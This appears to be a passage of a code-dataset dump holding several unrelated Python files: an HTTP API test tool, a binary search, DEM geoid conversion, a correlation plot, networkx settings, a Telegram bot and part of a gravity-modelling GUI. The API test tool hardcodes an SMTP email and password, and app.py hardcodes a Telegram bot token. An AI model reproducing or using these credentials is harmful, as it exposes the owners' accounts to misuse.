getMD5(api_host, urlencode(request_data).replace(\"%27\", \"%22\"))\n if status != 200:\n logging.error(num + ' ' + api_purpose + \"[ \" + str(status) + \" ], 获取md5验证码失败!!!\")\n continue\n request_data = dict(request_data, **{\"sign\": md5.decode(\"utf-8\")})\n request_data = urlencode(request_data).replace(\"%27\", \"%22\")\n elif encryption == 'DES':\n request_data = json.loads(request_data)\n request_data = urlencode({'param': encodePostStr(request_data)})\n else:\n request_data = urlencode(json.loads(request_data))\n except Exception as e:\n logging.error(num + ' ' + api_purpose + ' 请求的数据有误,请检查[Request Data]字段是否是标准的json格式字符串!')\n continue\n elif request_data_type == 'Data':\n dataFile = request_data\n if os.path.exists(dataFile):\n fopen = open(dataFile, encoding='utf-8')\n request_data = fopen.readline()\n fopen.close()\n for keyword in correlationDict:\n if request_data.find(keyword) > 0:\n request_data = request_data.replace(keyword, str(correlationDict[keyword]))\n request_data = request_data.encode('utf-8')\n elif request_data_type == 'File':\n dataFile = request_data\n if not os.path.exists(dataFile):\n logging.error(num + ' ' + api_purpose\n + ' 文件路径配置无效,请检查[Request Data]字段配置的文件路径是否存在!!!')\n continue\n fopen = open(dataFile, 'rb')\n data = fopen.read()\n fopen.close()\n request_data = '''\n ------WebKitFormBoundaryDf9uRfwb8uzv1eNe\n Content-Disposition:form-data;name=\"file\";filename=\"%s\"\n Content-Type:\n Content-Transfer-Encoding:binary\n %s\n ------WebKitFormBoundaryDf9uRfwb8uzv1eNe--\n ''' % (os.path.basename(dataFile), data)\n status, resp = interfaceTest(num, api_purpose, api_host, request_url, request_data, check_point, request_method,\n request_data_type, correlationDict['${session}'], isContains)\n # 判断请求结果\n if status != 200:\n errorCase.append((num + ' ' + api_purpose, str(status), 'http://' + api_host + request_url, resp))\n continue\n for j in range(len(correlation)):\n param = correlation[j].split('=')\n if len(param) == 2:\n if param[1] == '' or not re.search(r'^\\[', param[1]) or not re.search(r'\\]$', param[1]):\n logging.error(num + ' ' + api_purpose + ' 关联参数设置有误,请检查[Correlation]字段参数格式是否正确!!!')\n continue\n value = resp\n for key in param[1][1:-1].split(']['):\n try:\n temp = value[int(key)]\n except:\n try:\n temp = value[key]\n except:\n break\n value = temp\n correlationDict[param[0]] = value\n return errorCase\n\n\n# 接口测试\ndef interfaceTest(num, api_purpose, api_host, request_url, request_data, check_point, request_method, request_data_type,\n session,isContains):\n headers = {'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',\n 'X-Requested-With': 'XMLHttpRequest',\n 'Connection': 'keep-alive',\n 'CLIENT': 'WEB',\n 'Referer': 'http://' + api_host,\n 'sign': 'AAA',\n 'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1'}\n if session is not None:\n headers['Cookie'] = 'session=' + session\n if request_data_type == 'File':\n headers[\n 'Content-Type'] = 'multipart/form-data;boundary=----WebKitFormBoundaryDf9uRfwb8uzv1eNe;charset=UTF-8'\n elif request_data_type == 'Data':\n headers['Content-Type'] = 'text/plain; charset=UTF-8'\n\n conn = http.client.HTTPConnection(api_host)\n if request_method == 'POST':\n conn.request('POST', request_url, request_data, headers=headers)\n elif request_method == 'GET':\n conn.request('GET', request_url + '?' 
+ request_data, headers=headers)\n else:\n logging.error(num + ' ' + api_purpose + ' HTTP请求方法错误,请确认[Request Method]字段是否正确!!!')\n return 400, request_method\n response = conn.getresponse()\n status = response.status\n resp = response.read()\n if status == 200:\n resp = resp.decode('utf-8').replace('\\n\\t\\t', '').replace(' ', '')\n result = str(resp).find(check_point.replace(' ', ''))\n if result == 1 if isContains == 'Yes' else result == -1:\n logging.info(num + ' ' + api_purpose + ' 成功, ' + str(status) + ', ' + str(resp))\n return status, json.loads(resp)\n else:\n logging.error(num + ' ' + api_purpose + ' 操作失败!!!, [ ' + str(status) + ' ], ' + str(resp))\n return 2001, resp\n else:\n logging.error(num + ' ' + api_purpose + ' 请求失败!!!, [ ' + str(status) + ' ], ' + str(resp))\n return status, resp.decode('utf-8')\n\n\n# 获取md5验证码\ndef getMD5(url, postData):\n headers = {'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',\n 'X-Requested-With': 'XMLHttpRequest'}\n conn = http.client.HTTPConnection('this.ismyhost.com')\n conn.request('POST', '/get_isignature', postData, headers=headers)\n response = conn.getresponse()\n return response.status, response.read()\n\n\n# hash1加密\ndef hash1Encode(codeStr):\n hashobj = hashlib.sha1()\n hashobj.update(codeStr.encode('utf-8'))\n return hashobj.hexdigest()\n\n\n# DES加密\ndef desEncode(desStr):\n k = des('secretKEY', padmode=PAD_PKCS5)\n encodeStr = base64.b64encode(k.encrypt(json.dumps(desStr)))\n return encodeStr\n\n\n# 字典排序\ndef encodePostStr(postData):\n keyDict = {'key': 'secretKEY'}\n mergeDict = dict(postData, **keyDict)\n mergeDict = sorted(mergeDict.items())\n postStr = ''\n for i in mergeDict:\n postStr = postStr + i[0] + '=' + i[1] + '&'\n postStr = postStr[:-1]\n hashobj = hashlib.sha1()\n hashobj.update(postStr.encode('utf-8'))\n token = hashobj.hexdigest()\n postData['token'] = token\n return desEncode(postData)\n\n\n# 发送通知邮件\ndef sendMail(text):\n sender = '13990122270@163.com'\n receiver = ['huanglanting@kuaijiankang.com']\n mailToCc = ['738631563@qq.com']\n subject = '接口自动化测试报告通知'\n smtpserver = 'smtp.163.com'\n username = '13990122270@163.com'\n password = 'qwertyuioplmn123'\n\n msg = MIMEText(text, 'html', 'utf-8')\n msg['Subject'] = subject\n msg['From'] = sender\n msg['To'] = ';'.join(receiver)\n msg['Cc'] = ';'.join(mailToCc)\n try:\n smtp = smtplib.SMTP(smtpserver)\n # smtp.docmd(\"EHLO server\")\n # smtp.starttls()\n # smtp.EnableSsl = True\n # smtp.set_debuglevel(1)\n # smtp.connect(smtpserver)\n # smtp.docmd(\"AUTH LOGIN\")\n smtp.login(username, password)\n smtp.sendmail(sender, receiver + mailToCc, msg.as_string())\n print('email success!!!!!!!!!!')\n smtp.quit()\n except Exception as e: # 如果 try 中的语句没有执行,则���执行下面的 ret=False\n print(e)\n print('email wrong')\n\n\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":11891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"133484714","text":"def binary_search_iterative(array, left, right, x):\n while left <= right:\n mid = left + (right - left) // 2\n if x == array[mid]:\n return mid\n elif x > array[mid]:\n left = mid + 1\n else:\n right = mid - 1\n return -1\n\n\ndef binary_search_recursive(array, left, right, x):\n if left > right:\n return -1\n\n mid = left + (right - left) // 2\n\n if x == array[mid]:\n return mid\n elif x < array[mid]:\n return binary_search_recursive(array, left, mid - 1, x)\n else:\n return binary_search_recursive(array, mid + 1, right, x)","sub_path":"search/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"444242545","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# vim:fenc=utf-8\n#\n# Copyright 2015 David Lilien \n#\n# Distributed under terms of the MIT license.\n\n\"\"\"\nTake a tiff in south polar stereographic, convert it to geoid reference using bedmap tif. \n\"\"\"\n\nimport argparse\nimport sys\nimport os\nimport re\nimport glob\nimport numpy as np\nfrom demtools.lib import malib\nfrom demtools.lib import warplib\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Convert file to the geoid')\n parser.add_argument('fn', type=str, help='File to convert')\n parser.add_argument('-o', type=str, help='File to convert', default=None)\n parser.add_argument('-geo', type=str, help='Geoid to wgs84 reference',\n default='/Users/dlilien/work/antarctica_general/bedmap2_tiff/gl04c_geiod_to_WGS84.tif')\n parser.add_argument('-inv', action='store_false',\n help='If true (default) conversion file starts as geoid')\n args = parser.parse_args()\n fn_list = [args.fn, args.geo]\n convert(fn_list, outprefix=args.o, inv=args.inv)\n\n\ndef convert(fn_list, outprefix=None, inv=True):\n dem1_fn = fn_list[0]\n dem2_fn = fn_list[1]\n\n # Might want to limit intersection to dem1 and dem2, as vmap could be\n # significantly smaller\n dem1_ds, dem2_ds = warplib.memwarp_multi_fn(\n fn_list, extent='first', res='min')\n\n outdir = os.path.split(dem1_fn)[0]\n if outprefix is None:\n outprefix = os.path.splitext(os.path.split(dem1_fn)[1])[0] + '_geo.tif'\n dst_fn = os.path.join(outdir, outprefix)\n else:\n dst_fn = outprefix\n # Load input DEMs into masked arrays\n print(\"Loading input DEMs into masked arrays\")\n dem1 = malib.ds_getma(dem1_ds, 1)\n dem2 = malib.ds_getma(dem2_ds, 1)\n\n print()\n\n adj = ''\n if '-adj' in dem1_fn:\n adj = '-adj'\n dem1_fn_base = re.sub(adj, '', os.path.splitext(dem1_fn)[0])\n dem2_fn_base = re.sub(adj, '', os.path.splitext(dem2_fn)[0])\n\n #dem1_geoid = geolib.dem_geoid(dem1_fn)\n #dem2_geoid = geolib.dem_geoid(dem1_fn)\n\n # Less restrictive basename\n #dem1_fn_base = os.path.splitext(dem1_fn)[0].split('_mos_')[0]+'_mos'\n #dem2_fn_base = os.path.splitext(dem2_fn)[0].split('_mos_')[0]+'_mos'\n # This works for SPIRIT products as well\n dem1_fn_base = os.path.join(\n os.path.split(dem1_fn)[0], os.path.split(dem1_fn)[-1][0:13])\n dem2_fn_base = os.path.join(\n os.path.split(dem2_fn)[0], os.path.split(dem2_fn)[-1][0:13])\n\n def findfile(base_fn, ext):\n fn = glob.glob(base_fn + '*' + ext)\n if not fn:\n fn = None\n else:\n fn = fn[0]\n return fn\n\n tidecorr = True\n if tidecorr:\n #dem1_tide_fn = dem1_fn_base+'_tidecorr.tif'\n #dem2_tide_fn = dem2_fn_base+'_tidecorr.tif'\n dem1_tide_fn = findfile(dem1_fn_base, 'tidecorr.tif')\n if not dem1_tide_fn:\n dem1_tide_fn = findfile(\n dem1_fn_base, 'tidemodel_smooth_full_clip.tif')\n dem2_tide_fn = findfile(dem2_fn_base, 'tidecorr.tif')\n if not dem2_tide_fn:\n dem2_tide_fn = findfile(\n dem2_fn_base, 'tidemodel_smooth_full_clip.tif')\n if dem1_tide_fn and dem2_tide_fn:\n dem1_tide_ds, dem2_tide_ds = warplib.memwarp_multi_fn(\n [dem1_tide_fn, dem2_tide_fn], extent=dem1_ds, res=dem1_ds)\n dem1_tide = malib.ds_getma(dem1_tide_ds)\n dem2_tide = malib.ds_getma(dem2_tide_ds)\n tide_diff = dem2_tide - dem1_tide\n dst_fn = os.path.join(outdir, outprefix + '_tide_diff.tif')\n malib.writeGTiff(tide_diff, dst_fn, dem1_ds)\n # These values are tide prediction, to remove, want to subtract from observed elevation\n # Need to fill with 0 to prevent clipping to floating ice\n dem1 -= dem1_tide.filled(0)\n dem2 -= 
dem2_tide.filled(0)\n\n firnair = True\n # This is constant value for PIG\n dem1_firnair = 15.0\n dem2_firnair = dem1_firnair\n firnair_diff = dem2_firnair - dem1_firnair\n if firnair:\n #dem1_firnair_fn = dem1_fn_base+'_racmo_FirnAir.tif'\n #dem2_firnair_fn = dem2_fn_base+'_racmo_FirnAir.tif'\n dem1_firnair_fn = findfile(dem1_fn_base, 'racmo_FirnAir.tif')\n dem2_firnair_fn = findfile(dem2_fn_base, 'racmo_FirnAir.tif')\n if dem1_firnair_fn and dem2_firnair_fn:\n dem1_firnair_ds, dem2_firnair_ds = warplib.memwarp_multi_fn(\n [dem1_firnair_fn, dem2_firnair_fn], extent=dem1_ds, res=dem1_ds)\n dem1_firnair = malib.ds_getma(dem1_firnair_ds)\n dem2_firnair = malib.ds_getma(dem2_firnair_ds)\n firnair_diff = dem2_firnair - dem1_firnair\n dst_fn = os.path.join(outdir, outprefix + '_FirnAir_diff.tif')\n malib.writeGTiff(firnair_diff, dst_fn, dem1_ds)\n # These values are positive, total firn air content, want to subtract\n #dem1 -= dem1_firnair\n #dem2 -= dem2_firnair\n\n zs = True\n zs_diff = 0\n if zs:\n #dem1_zs_fn = dem1_fn_base+'_racmo_zs.tif'\n #dem2_zs_fn = dem2_fn_base+'_racmo_zs.tif'\n dem1_zs_fn = findfile(dem1_fn_base, 'racmo_zs.tif')\n dem2_zs_fn = findfile(dem2_fn_base, 'racmo_zs.tif')\n if dem1_zs_fn and dem2_zs_fn:\n dem1_zs_ds, dem2_zs_ds = warplib.memwarp_multi_fn(\n [dem1_zs_fn, dem2_zs_fn], extent=dem1_ds, res=dem1_ds)\n dem1_zs = malib.ds_getma(dem1_zs_ds)\n dem2_zs = malib.ds_getma(dem2_zs_ds)\n zs_diff = dem2_zs - dem1_zs\n dst_fn = os.path.join(outdir, outprefix + '_zs_diff.tif')\n malib.writeGTiff(zs_diff, dst_fn, dem1_ds)\n #dst_fn = os.path.join(outdir, outprefix+'_smb_diff.tif')\n #malib.writeGTiff(smb_diff, dst_fn, dem1_ds)\n\n # Check to make sure inputs actually intersect\n # Masked pixels are True\n if not np.any(~dem1.mask * ~dem2.mask):\n sys.exit(\"No valid overlap between input data\")\n\n # Compute common mask\n print(\"Generating common mask\")\n common_mask = malib.common_mask([dem1, dem2])\n\n # Compute relative elevation difference with Eulerian approach\n print(\"Computing elevation difference with Eulerian approach\")\n if inv:\n diff_euler = np.ma.array(dem1 - dem2, mask=common_mask)\n else:\n diff_euler = np.ma.array(dem2 + dem1, mask=common_mask)\n\n if True:\n print(\"Writing Eulerian elevation difference map\")\n print(dst_fn)\n malib.writeGTiff(diff_euler, dst_fn, dem1_ds)\n\nif __name__ == '__main__':\n main()\n","sub_path":"modeltools/bin/sps2geoid.py","file_name":"sps2geoid.py","file_ext":"py","file_size_in_byte":6610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"457361071","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nimport re\nimport csv\n\ndf = pd.read_csv('dataset.csv')\ncorrMatrix = df.corr()\nprint(corrMatrix)\nplt.matshow(corrMatrix)\nplt.show()\n\nx = []\ny = []\n\nwith open(\"dataset.csv\") as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n x.append([round(float(\"0.\"+re.sub(\"\\D\",\"\",x)[1:]), 2) for x in row[:10]])\n y.append(round(float(\"0.\"+re.sub(\"\\D\",\"\",row[10])[1:]), 2))\n\nplt.plot(x)\nplt.show()\n","sub_path":"Lab 8/Other/correlationMatrix.py","file_name":"correlationMatrix.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"606673934","text":"import os\nimport logging\nfrom networkx.utils import on_production_server\n\n# Load the settings file from the selected environment\n# eg if locally `NETWORKX_ENV` is set to 'ardvark_party' then we would\n# attempt to load the settings file `conf/ardvark_party.py`\n# If the app is deployed as someapp.appspot.com then we would\n# attempt to load the settings file `conf/someapp.py\n# If NETWORKX_ENV is not set, and it's not on a production server, then\n# env_name is 'dev' and setting are loaded from 'networkx/conf/dev.py'\n\n# Get the current networkx environment name and default to 'dev' if none set.\nenv_name = os.environ.get('NETWORKX_ENV', 'dev')\n\n# If were on the production server, then use the enviroment settings file that\n# corresponds to the appid.\nif on_production_server:\n from google.appengine.api.app_identity import get_application_id\n env_name = get_application_id().lower()\n\n# Construct the path\nif env_name.startswith('google.com:'):\n env_name = env_name.replace('google.com:', '')\n settings_path = os.path.join('networkx', 'conf', 'google', '%s.py' % env_name)\nelse:\n settings_path = os.path.join('networkx', 'conf', '%s.py' % env_name)\n\n# Execute the path to the environment setting file\nif not os.path.exists(settings_path):\n logging.error('Settings file named %s does not exist (env_name is %s)' % \\\n (settings_path, env_name))\n exit(1)\nelse:\n logging.info('Env %s' % env_name)\n execfile(settings_path)\n\n\n# If the app is not deployed then allow importing of a `local_settings.py`\n# file to allow some customization, eg custom logging settings etc..\n# if not on_production_server:\n # try:\n # from settings_local import *\n # except ImportError as e:\n # logging.info('NOTE: no local_settings.py file set: %s' % e)\n","sub_path":"networkx-d3-v2/networkx/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"425523027","text":"import sys\nimport imp\nfrom io import BytesIO\n\nimport telegram\nfrom flask import Flask, request, send_file\n\nfrom fsm import TocMachine\n\n\nAPI_TOKEN = '505050164:AAGxd3RICtZh9A36aTgnygxheiabZIQJRs0'\nWEBHOOK_URL = 'https://df48770a.ngrok.io/hook'\n\napp = Flask(__name__)\nbot = telegram.Bot(token=API_TOKEN)\nmachine = TocMachine(\n states=[\n 'user',\n 'drink',\n 'food',\n\t'play',\n\t'drinkname1',\n 'drinkname2',\n\t'drinkname3',\n\t'drinkname4',\n\t'drinkname5',\n\t'foodname1',\n\t'foodname2',\n 'foodname3',\n\t'foodname4',\n\t'foodname5',\n\t'zero',\n\t'mid',\n\t'high'\n ],\n transitions=[\n {\n 'trigger': 'advance',\n 'source': 'user',\n 'dest': 'drink',\n 'conditions': 'is_going_to_drink'\n },\n {\n 'trigger': 'advance',\n 'source': 'user',\n 'dest': 'food',\n 'conditions': 'is_going_to_food'\n },\n\t{\n 'trigger': 'advance',\n 'source': 'user',\n 'dest': 'play',\n 'conditions': 'is_going_to_play'\n },\n\t{\n 'trigger': 'advance',\n 'source': 'drink',\n 'dest': 'drinkname1',\n 'conditions': 'is_going_to_drinkname1'\n },\n {\n 'trigger': 'advance',\n 'source': 'drink',\n 'dest': 'drinkname2',\n 'conditions': 'is_going_to_drinkname2'\n },\n {\n 'trigger': 'advance',\n 'source': 'drink',\n 'dest': 'drinkname3',\n 'conditions': 'is_going_to_drinkname3'\n },\n\t{\n 'trigger': 'advance',\n 'source': 'drink',\n 'dest': 'drinkname4',\n 'conditions': 'is_going_to_drinkname4'\n },\n\t{\n 'trigger': 'advance',\n 'source': 'drink',\n 'dest': 'drinkname5',\n 'conditions': 'is_going_to_drinkname5'\n },\n\t{\n 'trigger': 'advance',\n 'source': 'food',\n 'dest': 'foodname1',\n 'conditions': 'is_going_to_foodname1'\n },\n {\n 'trigger': 'advance',\n 'source': 'food',\n 'dest': 'foodname2',\n 'conditions': 'is_going_to_foodname2'\n },\n {\n 'trigger': 'advance',\n 'source': 'food',\n 'dest': 'foodname3',\n 'conditions': 'is_going_to_foodname3'\n },\n\t{\n 'trigger': 'advance',\n 'source': 'food',\n 'dest': 'foodname4',\n 'conditions': 'is_going_to_foodname4'\n },\n\t{\n 'trigger': 'advance',\n 'source': 'food',\n 'dest': 'foodname5',\n 'conditions': 'is_going_to_foodname5'\n },\n\t{\n 'trigger': 'advance',\n 'source': 'play',\n 'dest': 'zero',\n 'conditions': 'is_going_to_zero'\n },\n\t{\n 'trigger': 'advance',\n 'source': 'play',\n 'dest': 'mid',\n 'conditions': 'is_going_to_mid'\n },\n\t{\n 'trigger': 'advance',\n 'source': 'play',\n 'dest': 'high',\n 'conditions': 'is_going_to_high'\n },\n {\n 'trigger': 'go_back',\n 'source': [\n 'drink',\n 'food',\n\t\t'play',\n\t\t'drinkname1',\n\t\t'drinkname2',\n 'drinkname3',\n\t\t'drinkname4',\n\t\t'drinkname5',\n\t\t'foodname1',\n\t\t'foodname2',\n 'foodname3',\n\t\t'foodname4',\n\t\t'foodname5',\n\t\t'zero',\n\t\t'mid',\n\t\t'high'\n ],\n 'dest': 'user'\n }\n ],\n initial='user',\n auto_transitions=False,\n show_conditions=True,\n)\n\n\ndef _set_webhook():\n status = bot.set_webhook(WEBHOOK_URL)\n if not status:\n print('Webhook setup failed')\n sys.exit(1)\n else:\n print('Your webhook URL has been set to \"{}\"'.format(WEBHOOK_URL))\n\n\n@app.route('/hook', methods=['POST'])\ndef webhook_handler():\n update = telegram.Update.de_json(request.get_json(force=True), bot)\n machine.advance(update)\n return 'ok'\n\n\n@app.route('/show-fsm', methods=['GET'])\ndef show_fsm():\n byte_io = BytesIO()\n machine.graph.draw(byte_io, prog='dot', format='png')\n byte_io.seek(0)\n return send_file(byte_io, attachment_filename='fsm.png', mimetype='image/png')\n\n\nif __name__ == \"__main__\":\n _set_webhook()\n 
app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"583947338","text":"\"\"\"\nSimple GUIs using the interactive capabilities of :mod:`matplotlib`\n\n**Interactive gravimetric modeling**\n\n* :class:`~fatiando.gui.simple.Moulder`\n* :class:`~fatiando.gui.simple.BasinTrap`\n* :class:`~fatiando.gui.simple.BasinTri`\n\n**Interactive modeling of layered media**\n\n* :class:`~fatiando.gui.simple.Lasagne`\n\n----\n\n\"\"\"\nimport bisect\n\nimport numpy\nfrom matplotlib import pyplot, widgets\n\nfrom .. import utils\nfrom ..gravmag import talwani\nfrom ..mesher import Polygon\nfrom ..seismic import profile\n\n\nclass Moulder():\n\n \"\"\"\n Interactive potential field direct modeling in 2D using polygons.\n\n Uses module :mod:`~fatiando.gravmag.talwani` for computations.\n\n For the moment only works for the gravity anomaly.\n\n To run this in a script, use::\n\n # Define the area of modeling\n area = (0, 1000, 0, 1000)\n # Where the gravity effect is calculated\n xp = range(0, 1000, 10)\n zp = [0]*len(xp)\n # Create the application\n app = Moulder(area, xp, zp)\n # Run it (close the window to finish)\n app.run()\n # and save the calculated gravity anomaly profile\n app.savedata(\"mydata.txt\")\n\n Parameters:\n\n * area : list = [xmin, xmax, zmin, zmax]\n Are of the subsuface to use for modeling. Remember, z is positive\n downward\n * xp, zp : array\n Arrays with the x and z coordinates of the computation points\n * gz : array\n The observed gravity values at the computation points.\n Will be plotted as black points together with the modeled (predicted)\n data. If None, will ignore this.\n\n \"The truth is out there\"\n\n \"\"\"\n\n instructions = '-'.join([\"Click to start drawing\",\n \"Choose density using the slider\",\n \"Right click to close polygon\",\n \"'e' to delete\"])\n name = \"Moulder - Direct gravimetric modeling\"\n\n def __init__(self, area, xp, zp, gz=None):\n if len(zp) != len(xp):\n raise ValueError(\"xp and zp must have same size\")\n # Get the data\n self.area = area\n self.x1, self.x2, z1, z2 = 0.001 * numpy.array(area)\n if gz is not None:\n if len(gz) != len(xp):\n raise ValueError(\"xp, zp and gz must have same size\")\n self.gz = numpy.array(gz)\n else:\n self.gz = gz\n self.xp = numpy.array(xp, dtype='f')\n self.zp = numpy.array(zp, dtype='f')\n # Make the figure\n self.fig = pyplot.figure(figsize=(12, 8))\n self.fig.canvas.set_window_title(self.name)\n self.fig.suptitle(self.instructions)\n self.draw = self.fig.canvas.draw\n # Make the data and model canvas\n self.dcanvas = self.fig.add_subplot(2, 1, 1)\n self.dcanvas.set_ylabel(\"mGal\")\n self.dcanvas.set_xlim(self.x1, self.x2)\n self.dcanvas.grid()\n self.mcanvas = self.fig.add_subplot(2, 1, 2)\n self.mcanvas.set_ylabel(\"Depth (km)\")\n self.mcanvas.set_xlabel(\"x (km)\")\n self.mcanvas.set_xlim(self.x1, self.x2)\n self.mcanvas.set_ylim(z2, z1)\n self.mcanvas.grid()\n self.fig.subplots_adjust(top=0.95, left=0.1, right=0.95, bottom=0.18,\n hspace=0.1)\n # Make the sliders\n sliderax = self.fig.add_axes([0.20, 0.08, 0.60, 0.03])\n self.densslider = widgets.Slider(sliderax, 'Density',\n -9, 9, valinit=0.,\n valfmt='%1.2f (g/cm3)')\n sliderax = self.fig.add_axes([0.20, 0.03, 0.60, 0.03])\n self.errslider = widgets.Slider(sliderax, 'Error',\n 0, 5, valinit=0.,\n valfmt='%1.2f (mGal)')\n # Initialize the data\n self.leg = None\n self.predgz = None\n self.predplot, = self.dcanvas.plot([], [], '-r', linewidth=2)\n if self.gz is not None:\n self.gzplot, = self.dcanvas.plot(xp * 0.001, gz, 'ok')\n self.nextdens = 1000.\n self.densslider.set_val(self.nextdens * 
0.001)\n self.error = 0.\n self.densities = []\n self.polygons = []\n self.nextpoly = []\n self.plotx = []\n self.ploty = []\n self.polyplots = []\n self.polyline, = self.mcanvas.plot([], [], marker='o', linewidth=2)\n\n def run(self):\n # Connect the event handlers\n self.picking = False\n self.connect()\n self.update()\n pyplot.show()\n\n def get_data(self):\n return self.predgz\n\n def savedata(self, fname):\n data = numpy.array([self.xp, self.zp, self.predgz]).T\n numpy.savetxt(fname, data, fmt='%.5f')\n\n def connect(self):\n self.densslider.on_changed(self.set_density)\n self.errslider.on_changed(self.set_error)\n self.fig.canvas.mpl_connect('button_press_event', self.pick)\n self.fig.canvas.mpl_connect('key_press_event', self.key_press)\n self.fig.canvas.mpl_connect('motion_notify_event', self.move)\n\n def update(self):\n if self.polygons:\n polys = []\n for p, d in zip(self.polygons, self.densities):\n polys.append(Polygon(1000. * numpy.array(p), {'density': d}))\n self.predgz = utils.contaminate(\n talwani.gz(self.xp, self.zp, polys), self.error)\n else:\n self.predgz = numpy.zeros_like(self.xp)\n self.predplot.set_data(self.xp * 0.001, self.predgz)\n if self.gz is not None:\n ymin = min(self.predgz.min(), self.gz.min())\n ymax = max(self.predgz.max(), self.gz.max())\n else:\n ymin = self.predgz.min()\n ymax = self.predgz.max()\n if ymin != ymax:\n self.dcanvas.set_ylim(ymin, ymax)\n self.draw()\n\n def set_density(self, value):\n self.nextdens = 1000. * value\n\n def set_error(self, value):\n self.error = value\n self.update()\n\n def move(self, event):\n pass\n\n def pick(self, event):\n if event.inaxes != self.mcanvas:\n return 0\n x, y = event.xdata, event.ydata\n if (event.button == 1):\n self.picking = True\n self.nextpoly.append([x, y])\n self.plotx.append(x)\n self.ploty.append(y)\n self.polyline.set_data(self.plotx, self.ploty)\n self.draw()\n if event.button == 3 or event.button == 2:\n if len(self.nextpoly) >= 3:\n self.polygons.append(self.nextpoly)\n self.densities.append(float(self.nextdens))\n self.update()\n self.picking = False\n self.plotx.append(self.nextpoly[0][0])\n self.ploty.append(self.nextpoly[0][1])\n self.polyline.set_data(self.plotx, self.ploty)\n fill, = self.mcanvas.fill(self.plotx, self.ploty,\n color=self.polyline.get_color(),\n alpha=0.5)\n self.polyline.set_label('%1.2f' % (0.001 * self.nextdens))\n self.legend()\n self.draw()\n self.polyplots.append([self.polyline, fill])\n self.plotx, self.ploty = [], []\n self.nextpoly = []\n self.polyline, = self.mcanvas.plot([], [], marker='o',\n linewidth=2)\n\n def legend(self):\n self.leg = self.mcanvas.legend(loc='lower right', numpoints=1,\n prop={'size': 9})\n self.leg.get_frame().set_alpha(0.5)\n\n def key_press(self, event):\n if event.key == 'e':\n if self.picking:\n if len(self.nextpoly) == 0:\n self.picking = False\n self.legend()\n self.draw()\n return 0\n self.nextpoly.pop()\n self.plotx.pop()\n self.ploty.pop()\n self.polyline.set_data(self.plotx, self.ploty)\n else:\n if len(self.polygons) == 0:\n return 0\n self.polygons.pop()\n self.densities.pop()\n line, fill = self.polyplots.pop()\n line.remove()\n fill.remove()\n self.update()\n self.draw()\n\n\nclass BasinTrap(Moulder):\n \"\"\"\n Interactive gravity modeling using a trapezoidal model.\n\n The trapezoid has two surface nodes with fixed position. The bottom two\n have fixed x coordinates but movable z. The x coordinates for the bottom\n nodes are the same as the ones for the surface nodes. 
The user can then\n model by controling the depths of the two bottom nodes.\n\n Example::\n\n # Define the area of modeling\n area = (0, 1000, 0, 1000)\n # Where the gravity effect is calculated\n xp = range(0, 1000, 10)\n zp = [0]*len(xp)\n # Where the two surface nodes are. Use depth = 1 because direct\n # modeling doesn't like it when the model and computation points\n # coincide\n nodes = [[100, 1], [900, 1]]\n # Create the application\n app = BasinTrap(area, nodes, xp, zp)\n # Run it (close the window to finish)\n app.run()\n # and save the calculated gravity anomaly profile\n app.savedata(\"mydata.txt\")\n\n Parameters:\n\n * area : list = [xmin, xmax, zmin, zmax]\n Are of the subsuface to use for modeling. Remember, z is positive\n downward.\n * nodes : list of lists = [[x1, z1], [x2, z2]]\n x and z coordinates of the two top nodes. Must be in clockwise order!\n * xp, zp : array\n Arrays with the x and z coordinates of the computation points\n * gz : array\n The observed gravity values at the computation points.\n Will be plotted as black points together with the modeled (predicted)\n data. If None, will ignore this.\n\n \"\"\"\n\n instructions = \"Click to set node depth - Right click to change nodes\"\n name = \"BasinTrap\"\n\n def __init__(self, area, nodes, xp, zp, gz=None):\n Moulder.__init__(self, area, xp, zp, gz)\n left, right = numpy.array(nodes) * 0.001\n z1 = z2 = 0.001 * 0.5 * (area[3] - area[2])\n self.polygons = [[left, right, [right[0], z1], [left[0], z2]]]\n self.nextdens = -1000\n self.densslider.set_val(self.nextdens * 0.001)\n self.densities = [self.nextdens]\n self.plotx = [v[0] for v in self.polygons[0]]\n self.plotx.append(left[0])\n self.ploty = [v[1] for v in self.polygons[0]]\n self.ploty.append(left[1])\n self.polyline.set_data(self.plotx, self.ploty)\n self.polyline.set_color('k')\n self.isleft = True\n self.guide, = self.mcanvas.plot([], [], marker='o', linestyle='--',\n color='red', linewidth=2)\n\n def draw_guide(self, x, z):\n if self.isleft:\n x0, z0 = self.polygons[0][3]\n x1, z1 = self.polygons[0][2]\n else:\n x0, z0 = self.polygons[0][2]\n x1, z1 = self.polygons[0][3]\n self.guide.set_data([x0, x0, x1], [z0, z, z1])\n\n def move(self, event):\n if event.inaxes != self.mcanvas:\n return 0\n self.draw_guide(event.xdata, event.ydata)\n self.draw()\n\n def set_density(self, value):\n self.densities[0] = 1000. * value\n self.update()\n self.draw()\n\n def pick(self, event):\n if event.inaxes != self.mcanvas:\n return 0\n x, y = event.xdata, event.ydata\n if (event.button == 1):\n if self.isleft:\n self.polygons[0][3][1] = y\n self.ploty[3] = y\n else:\n self.polygons[0][2][1] = y\n self.ploty[2] = y\n self.polyline.set_data(self.plotx, 